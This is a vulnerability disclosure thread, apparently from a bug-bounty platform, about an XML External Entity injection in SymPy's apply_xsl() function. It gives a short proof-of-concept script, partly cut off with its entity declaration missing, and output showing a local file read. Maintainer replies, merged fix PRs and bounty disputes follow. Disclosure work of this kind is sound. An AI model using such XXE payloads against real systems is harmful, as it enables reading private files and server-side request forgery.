XML External Entity (XXE) injection in sympy in sympy/sympy
Mar 29th 2023
Sympy is an open source platform that a computer algebra system written in pure Python .
Sympy is vulnerable to an XML External Entity (XXE) injection in the
apply_xsl() functionality of Sympy due to the usage of
Proof of Concept
// PoC.py from sympy.utilities.mathml import apply_xsl xsl = 'mathml/data/simple_mmlctop.xsl' mml = ''' <!--?xml version="1.0" ?--> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo> ''' res = apply_xsl(mml,xsl) print(res)
<userInfo> <firstName>John</firstName> <lastName> SENSITIVE INFORMATION. USERNAME: TEST PASSWORD: TEST </lastName> </userInfo>
As this vulnerable to XXE, which may lead to Arbitrary File Read, DoS, SSRF.
@maintainer Please use the above patch to mitigate this vulnerability. Thanks.
@admin Can u please check the comments in https://github.com/sympy/sympy/pull/24997. And send this report to appropriate people. Thanks.
Can you please explain the attack vector here? If you use Python, you can just open the file
d:/test/sensitive.txt directly using
A PR has been merged to fix this: https://github.com/sympy/sympy/pull/25007
Also another PR for the imminent 1.12 release: https://github.com/sympy/sympy/pull/25010
Can you confirm if that fixes the issue?
Hi @maintainer, tested on the latest code base, and I can confirm that the issue is resolved.
Can you please validate this issue, confirm the fix and assign a CVE? Thanks.
Hi @maintainer, 1.12 version is released with fix, can you please
Mark this as VALID and add the patch!
Hi @admin / @psmoros, I saw a comment in sympy which says
Hi team! To shed some light on what we do; a company that depends on SymPy is sponsoring security research into your project: up to per valid vulnerability for the researcher and for the maintainer.
Can you please allocate the bounty as per the comments? Thanks.
Hi @admin, can you please help the maintainer to solve the issue like how to add the patch in comment?
Just a reminder to adjust the disclosure bounty
up to $1040 per valid vulnerability.
And help the maintainer to add patches. Thanks.
Hi @admin, gentle reminder for the above ^^
Hey ready-research, I've reached out to @psmoros to get more information on this:)
Is there anything I should be doing here? The issue is fixed now and the fix is released.
Yes, please mark it as fixed and publish it using the green button above the comment section "Mark as fixed"
@psmoros @admin, can you please also look into the issue with the disclosure bounty? Thanks.
Hi @admin, can you please also look into the issue with the bounty?
@psmoros @Pavlos @benharvie @adam-nygate
What's the issue with the bounty?
Hi @psmoros, https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185 As per the comments disclosure bounty up to $1040 per valid vulnerability, but here we have only $75. Can you please adjust the bounty to $1040?
@admin @Pavlos ^^